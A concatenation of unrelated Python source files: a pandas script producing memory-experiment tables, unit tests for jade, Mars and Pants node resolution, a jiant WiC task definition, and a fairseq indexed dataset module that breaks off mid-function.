fatable = fatable.reset_index().drop(columns=['CI_l','CI_u']
).rename(columns={'condition':'CS Type',
'encode_phase':'Temporal Context',
'avg':'Mean',
'sem':'Std. Error'})
fatable['Temporal Context'] = ''
fatable = fatable[['Temporal Context','CS Type','Mean','95% CI','Std. Error']]
table = pd.concat((table,fatable))
table['Temporal Context'] = table['Temporal Context'].apply(lambda x: ctx_rname[x])
table['Temporal Context'] = pd.Categorical(table['Temporal Context'],['pre-conditioning','fear conditioning','post-conditioning',''],ordered=True)
table.sort_values(by='Temporal Context').round(4).to_csv('../paper/corrected_recognition_table.csv',index=False)
'''Replicating Dunsmoor (2015) Nature - mean proportion of responses'''
dfs = {}
for sub in all_sub_args:
if sub in [18,20,120]:
pass
else:
subj = bids_meta(sub)
old = subj.mem_df[subj.mem_df.memory_condition == 'Old'].reset_index(drop=True)[['trial_type','encode_phase','response','stimulus']]
old.response[old.response.isna()] = 'DN'
old = old.groupby(['trial_type','encode_phase','response']).count() / 24
new = subj.mem_df[subj.mem_df.memory_condition == 'New'].reset_index(drop=True)[['trial_type','encode_phase','response','stimulus']]
new.response[new.response.isna()] = 'DN'
new = new.groupby(['trial_type','encode_phase','response']).count() / 48
sub_df = pd.concat((old,new))
for con in cons:
for phase in ['baseline','acquisition','extinction','foil']:
for resp in ['DN','DO','MN','MO']:
try:
sub_df.loc[(con,phase,resp)]
except:
sub_df.loc[(con,phase,resp),'stimulus'] = 0.0
sub_df['subject'] = sub
dfs[sub] = sub_df.sort_index()
table = pd.concat(dfs.values()
).rename(columns={'stimulus':'proportion'}
).drop(columns=['subject']
).reset_index(
).groupby(['trial_type','encode_phase','response']
).mean(
).unstack(-1)
table.columns = table.columns.droplevel()
table = table[['DO','MO','MN','DN']]
table = table.reset_index()
table.encode_phase = pd.Categorical(table.encode_phase,['baseline','acquisition','extinction','foil'],ordered=True)
table = table.set_index(['encode_phase','trial_type']).sort_index()
table.round(3).to_csv('../paper/tables/Dunsmoor_2015_rep_table.csv')
'''Source memory'''
df = pd.read_csv('../cleaned_avg_sm.csv')
df['encode_phase'] = df['encode_phase'].apply(lambda x: ctx_rname[x])
df['encode_phase'] = pd.Categorical(df['encode_phase'],['pre-conditioning','fear conditioning','post-conditioning'],ordered=True)
df['response_phase'] = df['response_phase'].apply(lambda x: ctx_rname_short[x])
df['response_phase'] = pd.Categorical(df['response_phase'],['pre','cond.','post'],ordered=True)
table = df.groupby(['encode_phase','condition','response_phase'])['prop'].apply(onesample_bdm,(1/3))[['avg','CI_l','CI_u','p','tail']]
table['95% CI'] = table[['CI_l','CI_u']].values.tolist()
table = table.droplevel(-1).drop(columns=['CI_l','CI_u','tail']
).reset_index().rename(columns={'avg':'Mean',
'sem':'Std. Error',
'p':'P',
'encode_phase':'Temporal Context',
'condition':'CS Type',
'response_phase':'Response'})
table = table[['Temporal Context','CS Type','Response','Mean','95% CI','P']]
table['_sig'] = table.P.apply(p_convert)
table.round(4).to_csv('../paper/source_memory_table.csv',index=False)
'''Source memory betas'''
df = pd.concat((pd.read_csv('../paper/acquisition_sm_betas.csv'),
pd.read_csv('../paper/baseline_sm_betas.csv'),
pd.read_csv('../paper/extinction_sm_betas.csv'))).reset_index(drop=True)
df = df[['encode_phase','condition','response_phase','beta','ci','p']]
df['encode_phase'] = df['encode_phase'].apply(lambda x: ctx_rname[x])
df['encode_phase'] = pd.Categorical(df['encode_phase'],['pre-conditioning','fear conditioning','post-conditioning'],ordered=True)
df['response_phase'] = df['response_phase'].apply(lambda x: ctx_rname_short[x])
df['response_phase'] = pd.Categorical(df['response_phase'],['pre','cond.','post'],ordered=True)
table = df.rename(columns={'encode_phase':'Temporal Context',
'condition':'CS Type',
'response_phase':'Response',
'beta':'Mean',
'ci':'95% CI',
'p':'P'})
table.P = table.P.apply(lambda x: 0.0001 if x == 0 else x)
table = table.sort_values(by=['Temporal Context','CS Type','Response'])
table['_sig'] = table.P.apply(p_convert)
table.round(4).to_csv('../paper/souce_memory_betas_table.csv',index=False)
#do the stuff
'''Typicality betas'''
df = pd.read_csv('../paper/tables/typicality_betas.csv')
df = df[['phase','condition','beta','ci','p']]
df['phase'] = df['phase'].apply(lambda x: ctx_rname[x])
df['phase'] = pd.Categorical(df['phase'],['pre-conditioning','fear conditioning','post-conditioning'],ordered=True)
table = df.rename(columns={'phase':'Temporal Context',
'condition':'CS Type',
'beta':'Mean',
'ci':'95% CI',
'p':'P'})
table = table.sort_values(by=['Temporal Context','CS Type'])
table['_sig'] = table.P.apply(p_convert)
table.round(4).to_csv('../paper/tables/typicality_table.csv',index=False)
'''table with hit rate split by source memory responses'''
df = pd.read_csv('../cleaned_full_sm.csv')
df['encode_phase'] = df['encode_phase'].apply(lambda x: ctx_rname[x])
df['encode_phase'] = pd.Categorical(df['encode_phase'],['pre-conditioning','fear conditioning','post-conditioning'],ordered=True)
df['source_memory'] = df['source_memory'].apply(lambda x: ctx_rname_short[x])
df['source_memory'] = pd.Categorical(df['source_memory'],['pre','cond.','post'],ordered=True)
df = df.groupby(['encode_phase','condition','source_memory','subject']).mean()
table = df.groupby(['encode_phase','condition','source_memory'])['hc_acc'].mean()
table = table.reset_index().set_index(['encode_phase','condition','source_memory'])
table['sem'] = df.groupby(['encode_phase','condition','source_memory'])['hc_acc'].sem()
table = table.reset_index().rename(columns={'hc_acc':'Mean',
'sem':'Std. Error',
'encode_phase':'Temporal Context',
'condition':'CS Type',
'source_memory':'Response'})
table.round(4).to_csv('../paper/tables/hit_rate_by_source_memory.csv',index=False)
|
the-stack_106_19058
|
"""Unit tests for submission groups"""
import copy
import os
import shutil
from pathlib import Path
import pytest
from jade.extensions.generic_command import GenericCommandInputs
from jade.extensions.generic_command import GenericCommandConfiguration
from jade.hpc.common import HpcType
from jade.jobs.job_configuration_factory import create_config_from_file
from jade.models import SubmissionGroup, SubmitterParams
from jade.test_common import FAKE_HPC_CONFIG
from jade.utils.run_command import check_run_command, run_command
from jade.utils.utils import load_data
TEST_FILENAME = "test-inputs.txt"
CONFIG_FILE = "test-config.json"
OUTPUT = "test-output"
SUBMIT_JOBS = "jade submit-jobs -R none"
WAIT = "jade wait"
@pytest.fixture
def cleanup():
yield
for path in (TEST_FILENAME, CONFIG_FILE, OUTPUT):
if os.path.isdir(path):
shutil.rmtree(path)
elif os.path.exists(path):
os.remove(path)
def test_submission_groups(cleanup):
config = create_config()
config.dump(CONFIG_FILE)
cmd = f"{SUBMIT_JOBS} {CONFIG_FILE} --output={OUTPUT} -h {FAKE_HPC_CONFIG} -p 0.1"
check_run_command(cmd)
output_path = Path(OUTPUT)
config_batch_files = list(output_path.glob("config_batch*.json"))
assert len(config_batch_files) == 3
batch1 = load_data(output_path / "config_batch_1.json")
assert len(batch1["jobs"]) == 3
batch2 = load_data(output_path / "config_batch_2.json")
assert len(batch2["jobs"]) == 1
assert batch2["jobs"][0]["job_id"] == 4
batch3 = load_data(output_path / "config_batch_3.json")
assert len(batch3["jobs"]) == 1
assert batch3["jobs"][0]["job_id"] == 5
def test_submission_groups_duplicate_name(cleanup):
config = create_config()
config.submission_groups[0].name = config.submission_groups[1].name
config.dump(CONFIG_FILE)
cmd = f"{SUBMIT_JOBS} {CONFIG_FILE} --output={OUTPUT} -h {FAKE_HPC_CONFIG} --dry-run"
assert run_command(cmd) != 0
def test_submission_groups_mixed_hpc_types(cleanup):
config = create_config()
config.submission_groups[0].submitter_params.hpc_config.hpc_type = HpcType.SLURM
config.dump(CONFIG_FILE)
cmd = f"{SUBMIT_JOBS} {CONFIG_FILE} --output={OUTPUT} -h {FAKE_HPC_CONFIG} --dry-run"
assert run_command(cmd) != 0
def test_submission_groups_mixed_max_nodes(cleanup):
config = create_config()
config.submission_groups[0].submitter_params.max_nodes = 5
config.dump(CONFIG_FILE)
cmd = f"{SUBMIT_JOBS} {CONFIG_FILE} --output={OUTPUT} -h {FAKE_HPC_CONFIG} --dry-run"
assert run_command(cmd) != 0
def test_submission_groups_per_node_setup(cleanup):
config = create_config()
config.submission_groups[1].submitter_params.node_setup_script = "node.sh"
config.dump(CONFIG_FILE)
cmd = f"{SUBMIT_JOBS} {CONFIG_FILE} --output={OUTPUT} -h {FAKE_HPC_CONFIG} --dry-run"
check_run_command(cmd)
config = create_config_from_file(Path(OUTPUT) / "config_batch_2.json")
assert config.get_default_submission_group().submitter_params.node_setup_script == "node.sh"
def create_config():
num_commands = 5
commands = ['echo "hello world"'] * num_commands
with open(TEST_FILENAME, "w") as f_out:
for command in commands:
f_out.write(command + "\n")
inputs = GenericCommandInputs(TEST_FILENAME)
config = GenericCommandConfiguration(job_inputs=inputs)
jobs = list(inputs.iter_jobs())
for i, job_param in enumerate(jobs):
if i < 3:
job_param.submission_group = "group1"
else:
job_param.submission_group = "group2"
config.add_job(job_param)
hpc_config1 = load_data(FAKE_HPC_CONFIG)
hpc_config2 = copy.deepcopy(hpc_config1)
hpc_config1["hpc"]["walltime"] = "1:00:00"
hpc_config2["hpc"]["walltime"] = "5:00:00"
params1 = SubmitterParams(hpc_config=hpc_config1, per_node_batch_size=3)
params2 = SubmitterParams(hpc_config=hpc_config2, per_node_batch_size=1)
group1 = SubmissionGroup(name="group1", submitter_params=params1)
group2 = SubmissionGroup(name="group2", submitter_params=params2)
config.append_submission_group(group1)
config.append_submission_group(group2)
return config
|
the-stack_106_19059
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2018 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from mars.tensor.execution.core import Executor
from mars.tensor import ones
from mars.session import LocalSession, Session
class Test(unittest.TestCase):
def setUp(self):
self.executor = Executor('numpy')
local_session = LocalSession()
local_session._executor = self.executor
self.session = Session()
self.session._sess = local_session
def testDecref(self):
a = ones((10, 20), chunk_size=5)
b = a + 1
b.execute(session=self.session)
self.assertEqual(len(self.executor.chunk_result), 8)
del b
# decref called
self.assertEqual(len(self.executor.chunk_result), 0)
|
the-stack_106_19060
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import json
import os
from textwrap import dedent
from pants.build_graph.target import Target
from pants_test.tasks.task_test_base import TaskTestBase
from pants.contrib.node.subsystems.resolvers.node_preinstalled_module_resolver import \
NodePreinstalledModuleResolver
from pants.contrib.node.subsystems.resolvers.npm_resolver import NpmResolver
from pants.contrib.node.targets.node_module import NodeModule
from pants.contrib.node.targets.node_preinstalled_module import NodePreinstalledModule
from pants.contrib.node.targets.node_remote_module import NodeRemoteModule
from pants.contrib.node.tasks.node_paths import NodePaths
from pants.contrib.node.tasks.node_resolve import NodeResolve
class NodeResolveTest(TaskTestBase):
@classmethod
def task_type(cls):
return NodeResolve
def setUp(self):
super(NodeResolveTest, self).setUp()
NodeResolve.register_resolver_for_type(NodePreinstalledModule, NodePreinstalledModuleResolver)
NodeResolve.register_resolver_for_type(NodeModule, NpmResolver)
def tearDown(self):
super(NodeResolveTest, self).tearDown()
NodeResolve._clear_resolvers()
def test_register_resolver_for_type(self):
NodeResolve._clear_resolvers()
self.assertIsNone(NodeResolve._resolver_for_target(NodePreinstalledModule))
self.assertIsNone(NodeResolve._resolver_for_target(NodeModule))
node_preinstalled__module_target = self.make_target(
spec=':empty_fake_node_preinstalled_module_target',
target_type=NodePreinstalledModule)
NodeResolve.register_resolver_for_type(NodePreinstalledModule, NodePreinstalledModuleResolver)
self.assertEqual(NodePreinstalledModuleResolver,
NodeResolve._resolver_for_target(node_preinstalled__module_target))
node_module_target = self.make_target(spec=':empty_fake_node_module_target',
target_type=NodeModule)
NodeResolve.register_resolver_for_type(NodeModule, NpmResolver)
self.assertEqual(NpmResolver,
NodeResolve._resolver_for_target(node_module_target))
def test_product_types(self):
self.assertEqual([NodePaths], NodeResolve.product_types())
def test_noop(self):
task = self.create_task(self.context())
task.execute()
def test_noop_na(self):
target = self.make_target(spec=':not_a_node_target', target_type=Target)
task = self.create_task(self.context(target_roots=[target]))
task.execute()
def test_resolve_simple(self):
typ = self.make_target(spec='3rdparty/node:typ', target_type=NodeRemoteModule, version='0.6.3')
self.create_file('src/node/util/package.json', contents=dedent("""
{
"name": "util",
"version": "0.0.1"
}
"""))
self.create_file('src/node/util/util.js', contents=dedent("""
var typ = require('typ');
console.log("type of boolean is: " + typ.BOOLEAN);
"""))
target = self.make_target(spec='src/node/util',
target_type=NodeModule,
sources=['util.js', 'package.json'],
dependencies=[typ])
context = self.context(target_roots=[target])
task = self.create_task(context)
task.execute()
node_paths = context.products.get_data(NodePaths)
node_path = node_paths.node_path(target)
self.assertIsNotNone(node_path)
script_path = os.path.join(node_path, 'util.js')
out = task.node_distribution.node_command(args=[script_path]).check_output()
self.assertIn('type of boolean is: boolean', out)
def test_resolve_simple_graph(self):
typ1 = self.make_target(spec='3rdparty/node:typ1',
target_type=NodeRemoteModule,
package_name='typ',
version='0.6.x')
typ2 = self.make_target(spec='3rdparty/node:typ2',
target_type=NodeRemoteModule,
package_name='typ',
version='0.6.1')
self.create_file('src/node/util/package.json', contents=dedent("""
{
"name": "util",
"version": "0.0.1"
}
"""))
self.create_file('src/node/util/typ.js', contents=dedent("""
var typ = require('typ');
module.exports = {
BOOL: typ.BOOLEAN
};
"""))
util = self.make_target(spec='src/node/util',
target_type=NodeModule,
sources=['typ.js', 'package.json'],
dependencies=[typ1])
self.create_file('src/node/leaf/package.json', contents=dedent("""
{
"name": "leaf",
"version": "0.0.1"
}
"""))
self.create_file('src/node/leaf/leaf.js', contents=dedent("""
var typ = require('typ');
var util_typ = require('util/typ');
console.log("type of boolean is: " + typ.BOOLEAN);
console.log("type of bool is: " + util_typ.BOOL);
"""))
leaf = self.make_target(spec='src/node/leaf',
target_type=NodeModule,
sources=['leaf.js', 'package.json'],
dependencies=[util, typ2])
context = self.context(target_roots=[leaf])
task = self.create_task(context)
task.execute()
node_paths = context.products.get_data(NodePaths)
self.assertIsNotNone(node_paths.node_path(util))
node_path = node_paths.node_path(leaf)
self.assertIsNotNone(node_paths.node_path(leaf))
# Verify the 'typ' package is not duplicated under leaf. The target dependency tree is:
# leaf
# typ2 (0.6.1)
# util
# typ1 (0.6.x)
# If we install leaf normally, NPM will install the typ2 target (typ version 0.6.1) at the top
# level under leaf, and then not install the typ1 target (typ version 0.6.x) under util
# because the dependency is already satisfied.
typ_packages = []
for root, _, files in os.walk(node_path):
for f in files:
if 'package.json' == f:
with open(os.path.join(root, f)) as fp:
package = json.load(fp)
if 'typ' == package['name']:
typ_packages.append(os.path.relpath(os.path.join(root, f), node_path))
self.assertEqual(1, len(typ_packages),
'Expected to find exactly 1 de-duped `typ` package, but found these:'
'\n\t{}'.format('\n\t'.join(sorted(typ_packages))))
script_path = os.path.join(node_path, 'leaf.js')
out = task.node_distribution.node_command(args=[script_path]).check_output()
lines = {line.strip() for line in out.splitlines()}
self.assertIn('type of boolean is: boolean', lines)
self.assertIn('type of bool is: boolean', lines)
def test_resolve_preserves_package_json(self):
self.create_file('src/node/util/package.json', contents=dedent("""
{
"name": "util",
"version": "0.0.1"
}
"""))
util = self.make_target(spec='src/node/util',
target_type=NodeModule,
sources=['package.json'],
dependencies=[])
self.create_file('src/node/scripts_project/package.json', contents=dedent("""
{
"name": "scripts_project",
"version": "1.2.3",
"dependencies": { "A": "file://A" },
"devDependencies": { "B": "file://B" },
"peerDependencies": { "C": "file://C" },
"optionalDependencies": { "D": "file://D" },
"scripts": {
"test": "mocha */dist.js"
}
}
"""))
scripts_project = self.make_target(spec='src/node/scripts_project',
target_type=NodeModule,
sources=['package.json'],
dependencies=[util])
context = self.context(target_roots=[scripts_project])
task = self.create_task(context)
task.execute()
node_paths = context.products.get_data(NodePaths)
node_path = node_paths.node_path(scripts_project)
self.assertIsNotNone(node_paths.node_path(scripts_project))
package_json_path = os.path.join(node_path, 'package.json')
with open(package_json_path) as fp:
package = json.load(fp)
self.assertEqual('scripts_project', package['name'],
'Expected to find package name of `scripts_project`, but found: {}'
.format(package['name']))
self.assertEqual('1.2.3', package['version'],
'Expected to find package version of `1.2.3`, but found: {}'
.format(package['version']))
self.assertEqual('mocha */dist.js', package['scripts']['test'],
'Expected to find package test script of `mocha */dist.js`, but found: {}'
.format(package['scripts']['test']))
self.assertEqual(node_paths.node_path(util), package['dependencies']['util'])
self.assertNotIn('A', package['dependencies'])
self.assertNotIn('devDependencies', package)
self.assertNotIn('peerDependencies', package)
self.assertNotIn('optionalDependencies', package)
|
the-stack_106_19062
|
import numpy as np
import torch
from dataclasses import dataclass
from typing import List
from jiant.tasks.core import (
BaseExample,
BaseTokenizedExample,
BaseDataRow,
BatchMixin,
Task,
TaskTypes,
)
from jiant.tasks.lib.templates.shared import (
labels_to_bimap,
add_cls_token,
create_input_set_from_tokens_and_segments,
)
from jiant.tasks.utils import truncate_sequences, ExclusiveSpan
from jiant.utils.python.io import read_json_lines
from jiant.tasks.lib.templates import hacky_tokenization_matching as tokenization_utils
@dataclass
class Example(BaseExample):
guid: str
sentence1: str
sentence2: str
word: str
span1: ExclusiveSpan
span2: ExclusiveSpan
label: str
def tokenize(self, tokenizer):
sentence1_tokens, sentence1_span = tokenization_utils.get_token_span(
sentence=self.sentence1, span=self.span1, tokenizer=tokenizer,
)
sentence2_tokens, sentence2_span = tokenization_utils.get_token_span(
sentence=self.sentence2, span=self.span2, tokenizer=tokenizer,
)
return TokenizedExample(
guid=self.guid,
sentence1_tokens=sentence1_tokens,
sentence2_tokens=sentence2_tokens,
word=tokenizer.tokenize(self.word), # might be more than one token
sentence1_span=sentence1_span,
sentence2_span=sentence2_span,
label_id=WiCTask.LABEL_TO_ID[self.label],
)
@dataclass
class TokenizedExample(BaseTokenizedExample):
guid: str
sentence1_tokens: List[str]
sentence2_tokens: List[str]
word: List[str]
sentence1_span: ExclusiveSpan
sentence2_span: ExclusiveSpan
label_id: int
def featurize(self, tokenizer, feat_spec):
if feat_spec.sep_token_extra:
maybe_extra_sep = [tokenizer.sep_token]
maybe_extra_sep_segment_id = [feat_spec.sequence_a_segment_id]
special_tokens_count = 6 # CLS, SEP-SEP, SEP-SEP, SEP
else:
maybe_extra_sep = []
maybe_extra_sep_segment_id = []
special_tokens_count = 4 # CLS, SEP, SEP, SEP
sentence1_tokens, sentence2_tokens = truncate_sequences(
tokens_ls=[self.sentence1_tokens, self.sentence2_tokens],
max_length=feat_spec.max_seq_length - len(self.word) - special_tokens_count,
)
unpadded_tokens = (
self.word
+ [tokenizer.sep_token]
+ maybe_extra_sep
+ sentence1_tokens
+ [tokenizer.sep_token]
+ maybe_extra_sep
+ sentence2_tokens
+ [tokenizer.sep_token]
)
# Don't have a choice here -- just leave words as part of sent1
unpadded_segment_ids = (
[feat_spec.sequence_a_segment_id] * (len(self.word) + 1)
+ maybe_extra_sep_segment_id
+ [feat_spec.sequence_a_segment_id] * (len(sentence1_tokens) + 1)
+ maybe_extra_sep_segment_id
+ [feat_spec.sequence_b_segment_id] * (len(sentence2_tokens) + 1)
)
unpadded_inputs = add_cls_token(
unpadded_tokens=unpadded_tokens,
unpadded_segment_ids=unpadded_segment_ids,
tokenizer=tokenizer,
feat_spec=feat_spec,
)
input_set = create_input_set_from_tokens_and_segments(
unpadded_tokens=unpadded_inputs.unpadded_tokens,
unpadded_segment_ids=unpadded_inputs.unpadded_segment_ids,
tokenizer=tokenizer,
feat_spec=feat_spec,
)
word_sep_offset = 2 if feat_spec.sep_token_extra else 1
sent1_sep_offset = 2 if feat_spec.sep_token_extra else 1
# Both should be inclusive spans at the end
sentence1_span = ExclusiveSpan(
start=self.sentence1_span[0]
+ unpadded_inputs.cls_offset
+ word_sep_offset
+ len(self.word),
end=self.sentence1_span[1]
+ unpadded_inputs.cls_offset
+ word_sep_offset
+ len(self.word),
).to_inclusive()
sentence2_span = ExclusiveSpan(
start=self.sentence2_span[0]
+ unpadded_inputs.cls_offset
+ word_sep_offset
+ sent1_sep_offset
+ len(self.word)
+ len(sentence1_tokens),
end=self.sentence2_span[1]
+ unpadded_inputs.cls_offset
+ word_sep_offset
+ sent1_sep_offset
+ len(self.word)
+ len(sentence1_tokens),
).to_inclusive()
return DataRow(
guid=self.guid,
input_ids=np.array(input_set.input_ids),
input_mask=np.array(input_set.input_mask),
segment_ids=np.array(input_set.segment_ids),
spans=np.array([sentence1_span, sentence2_span]),
label_id=self.label_id,
tokens=unpadded_inputs.unpadded_tokens,
word=self.word,
)
@dataclass
class DataRow(BaseDataRow):
guid: str
input_ids: np.array
input_mask: np.array
segment_ids: np.array
spans: np.array # num_spans x 2
label_id: int
tokens: List
word: List
@dataclass
class Batch(BatchMixin):
input_ids: torch.LongTensor
input_mask: torch.LongTensor
segment_ids: torch.LongTensor
spans: torch.LongTensor
label_id: torch.LongTensor
tokens: List
word: List
class WiCTask(Task):
Example = Example
TokenizedExample = Example
DataRow = DataRow
Batch = Batch
TASK_TYPE = TaskTypes.SPAN_COMPARISON_CLASSIFICATION
LABELS = [False, True]
LABEL_TO_ID, ID_TO_LABEL = labels_to_bimap(LABELS)
@property
def num_spans(self):
return 2
def get_train_examples(self):
return self._create_examples(lines=read_json_lines(self.train_path), set_type="train")
def get_val_examples(self):
return self._create_examples(lines=read_json_lines(self.val_path), set_type="val")
def get_test_examples(self):
return self._create_examples(lines=read_json_lines(self.test_path), set_type="test")
@classmethod
def _create_examples(cls, lines, set_type):
examples = []
for line in lines:
span1 = ExclusiveSpan(int(line["start1"]), int(line["end1"]))
span2 = ExclusiveSpan(int(line["start2"]), int(line["end2"]))
# Note, the chosen word may be different (e.g. different tenses) in sent1 and sent2,
# hence we don't do an assert here.
examples.append(
Example(
guid="%s-%s" % (set_type, line["idx"]),
sentence1=line["sentence1"],
sentence2=line["sentence2"],
word=line["word"],
span1=span1,
span2=span2,
label=line["label"] if set_type != "test" else cls.LABELS[-1],
)
)
return examples
|
the-stack_106_19063
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from functools import lru_cache
import os
import shutil
import struct
import numpy as np
import torch
from . import FairseqDataset
def __best_fitting_dtype(vocab_size=None):
if vocab_size is not None and vocab_size < 65500:
return np.uint16
else:
return np.int32
def get_available_dataset_impl():
return ['raw', 'lazy', 'cached', 'mmap']
def infer_dataset_impl(path):
if IndexedRawTextDataset.exists(path):
return 'raw'
elif IndexedDataset.exists(path):
with open(index_file_path(path), 'rb') as f:
magic = f.read(8)
if magic == IndexedDataset._HDR_MAGIC:
return 'cached'
elif magic == MMapIndexedDataset.Index._HDR_MAGIC[:8]:
return 'mmap'
else:
return None
else:
return None
def make_builder(out_file, impl, vocab_size=None):
if impl == 'mmap':
return MMapIndexedDatasetBuilder(out_file, dtype=__best_fitting_dtype(vocab_size))
else:
return IndexedDatasetBuilder(out_file)
def make_dataset(path, impl, fix_lua_indexing=False, dictionary=None):
if impl == 'raw' and IndexedRawTextDataset.exists(path):
assert dictionary is not None
return IndexedRawTextDataset(path, dictionary)
elif impl == 'lazy' and IndexedDataset.exists(path):
return IndexedDataset(path, fix_lua_indexing=fix_lua_indexing)
elif impl == 'cached' and IndexedDataset.exists(path):
return IndexedCachedDataset(path, fix_lua_indexing=fix_lua_indexing)
elif impl == 'mmap' and MMapIndexedDataset.exists(path):
return MMapIndexedDataset(path)
return None
def dataset_exists(path, impl):
if impl == 'raw':
return IndexedRawTextDataset.exists(path)
elif impl == 'mmap':
return MMapIndexedDataset.exists(path)
else:
return IndexedDataset.exists(path)
def read_longs(f, n):
a = np.empty(n, dtype=np.int64)
f.readinto(a)
return a
def write_longs(f, a):
f.write(np.array(a, dtype=np.int64))
dtypes = {
1: np.uint8,
2: np.int8,
3: np.int16,
4: np.int32,
5: np.int64,
6: np.float,
7: np.double,
8: np.uint16
}
def code(dtype):
for k in dtypes.keys():
if dtypes[k] == dtype:
return k
raise ValueError(dtype)
def index_file_path(prefix_path):
return prefix_path + '.idx'
def data_file_path(prefix_path):
return prefix_path + '.bin'
class IndexedDataset(FairseqDataset):
"""Loader for TorchNet IndexedDataset"""
_HDR_MAGIC = b'TNTIDX\x00\x00'
def __init__(self, path, fix_lua_indexing=False):
super().__init__()
self.path = path
self.fix_lua_indexing = fix_lua_indexing
self.data_file = None
self.read_index(path)
def read_index(self, path):
with open(index_file_path(path), 'rb') as f:
magic = f.read(8)
assert magic == self._HDR_MAGIC, (
'Index file doesn\'t match expected format. '
'Make sure that --dataset-impl is configured properly.'
)
version = f.read(8)
assert struct.unpack('<Q', version) == (1,)
code, self.element_size = struct.unpack('<QQ', f.read(16))
self.dtype = dtypes[code]
self._len, self.s = struct.unpack('<QQ', f.read(16))
self.dim_offsets = read_longs(f, self._len + 1)
self.data_offsets = read_longs(f, self._len + 1)
self.sizes = read_longs(f, self.s)
def read_data(self, path):
self.data_file = open(data_file_path(path), 'rb', buffering=0)
def check_index(self, i):
if i < 0 or i >= self._len:
raise IndexError('index out of range')
def __del__(self):
if self.data_file:
self.data_file.close()
@lru_cache(maxsize=8)
def __getitem__(self, i):
if not self.data_file:
self.read_data(self.path)
self.check_index(i)
tensor_size = self.sizes[self.dim_offsets[i]:self.dim_offsets[i + 1]]
a = np.empty(tensor_size, dtype=self.dtype)
self.data_file.seek(self.data_offsets[i] * self.element_size)
self.data_file.readinto(a)
item = torch.from_numpy(a).long()
if self.fix_lua_indexing:
item -= 1 # subtract 1 for 0-based indexing
return item
def __len__(self):
return self._len
def num_tokens(self, index):
return self.sizes[index]
def size(self, index):
return self.sizes[index]
@staticmethod
def exists(path):
return (
os.path.exists(index_file_path(path)) and os.path.exists(data_file_path(path))
)
@property
def supports_prefetch(self):
return False # avoid prefetching to save memory
class IndexedCachedDataset(IndexedDataset):
def __init__(self, path, fix_lua_indexing=False):
super().__init__(path, fix_lua_indexing=fix_lua_indexing)
self.cache = None
self.cache_index = {}
@property
def supports_prefetch(self):
return True
def prefetch(self, indices):
if all(i in self.cache_index for i in indices):
return
if not self.data_file:
self.read_data(self.path)
indices = sorted(set(indices))
total_size = 0
for i in indices:
total_size += self.data_offsets[i + 1] - self.data_offsets[i]
self.cache = np.empty(total_size, dtype=self.dtype)
ptx = 0
self.cache_index.clear()
for i in indices:
self.cache_index[i] = ptx
size = self.data_offsets[i + 1] - self.data_offsets[i]
a = self.cache[ptx: ptx + size]
self.data_file.seek(self.data_offsets[i] * self.element_size)
self.data_file.readinto(a)
ptx += size
if self.data_file:
# close and delete data file after prefetch so we can pickle
self.data_file.close()
self.data_file = None
@lru_cache(maxsize=8)
def __getitem__(self, i):
self.check_index(i)
tensor_size = self.sizes[self.dim_offsets[i]:self.dim_offsets[i + 1]]
a = np.empty(tensor_size, dtype=self.dtype)
ptx = self.cache_index[i]
np.copyto(a, self.cache[ptx: ptx + a.size])
item = torch.from_numpy(a).long()
if self.fix_lua_indexing:
item -= 1 # subtract 1 for 0-based indexing
return item
class IndexedRawTextDataset(FairseqDataset):
"""Takes a text file as input and binarizes it in memory at instantiation.
Original lines are also kept in memory"""
def __init__(self, path, dictionary, append_eos=True, reverse_order=False):
self.tokens_list = []
self.lines = []
self.sizes = []
self.append_eos = append_eos
self.reverse_order = reverse_order
self.read_data(path, dictionary)
self.size = len(self.tokens_list)
def read_data(self, path, dictionary):
with open(path, 'r', encoding='utf-8') as f:
for line in f:
self.lines.append(line.strip('\n'))
tokens = dictionary.encode_line(
line, add_if_not_exist=False,
append_eos=self.append_eos, reverse_order=self.reverse_order,
).long()
self.tokens_list.append(tokens)
self.sizes.append(len(tokens))
self.sizes = np.array(self.sizes)
def check_index(self, i):
if i < 0 or i >= self.size:
raise IndexError('index out of range')
@lru_cache(maxsize=8)
def __getitem__(self, i):
self.check_index(i)
return self.tokens_list[i]
def get_original_text(self, i):
self.check_index(i)
return self.lines[i]
def __del__(self):
pass
def __len__(self):
return self.size
def num_tokens(self, index):
return self.sizes[index]
def size(self, index):
return self.sizes[index]
@staticmethod
def exists(path):
return os.path.exists(path)
class IndexedDatasetBuilder(object):
element_sizes = {
np.uint8: 1,
np.int8: 1,
np.int16: 2,
np.int32: 4,
np.int64: 8,
np.float: 4,
np.double: 8
}
def __init__(self, out_file, dtype=np.int32):
self.out_file = open(out_file, 'wb')
self.dtype = dtype
self.data_offsets = [0]
self.dim_offsets = [0]
self.sizes = []
self.element_size = self.element_sizes[self.dtype]
def add_item(self, tensor):
# +1 for Lua compatibility
bytes = self.out_file.write(np.array(tensor.numpy() + 1, dtype=self.dtype))
self.data_offsets.append(self.data_offsets[-1] + bytes / self.element_size)
for s in tensor.size():
self.sizes.append(s)
self.dim_offsets.append(self.dim_offsets[-1] + len(tensor.size()))
def merge_file_(self, another_file):
index = IndexedDataset(another_file)
assert index.dtype == self.dtype
begin = self.data_offsets[-1]
for offset in index.data_offsets[1:]:
self.data_offsets.append(begin + offset)
self.sizes.extend(index.sizes)
begin = self.dim_offsets[-1]
for dim_offset in index.dim_offsets[1:]:
self.dim_offsets.append(begin + dim_offset)
with open(data_file_path(another_file), 'rb') as f:
while True:
data = f.read(1024)
if data:
self.out_file.write(data)
else:
break
def finalize(self, index_file):
self.out_file.close()
index = open(index_file, 'wb')
index.write(b'TNTIDX\x00\x00')
index.write(struct.pack('<Q', 1))
index.write(struct.pack('<QQ', code(self.dtype), self.element_size))
